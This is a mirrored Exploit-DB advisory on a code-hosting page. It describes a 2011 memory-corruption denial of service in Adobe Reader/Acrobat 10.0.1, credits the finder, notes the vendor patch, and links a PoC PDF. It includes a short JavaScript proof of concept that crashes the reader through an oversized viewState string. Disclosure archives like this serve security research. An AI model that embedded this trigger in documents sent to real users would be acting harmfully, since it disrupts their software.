bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/17405.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
939 B
Text
Raw Blame History

Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
- http://secunia.com/advisories/43269/
]
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
]
PoC: Tested on Windows 7 SP1 and Windows XP SP3
PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
/*****************************************************************************/
var temp;
for(var i=0;i<=8;i++)
{
temp+=temp+temp+"A";
}
var result = temp;
try{
viewState= result;
}catch(e){}
dirty; // Important!
/*****************************************************************************/
PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17405.pdf
Reference in a new issue View git blame Copy permalink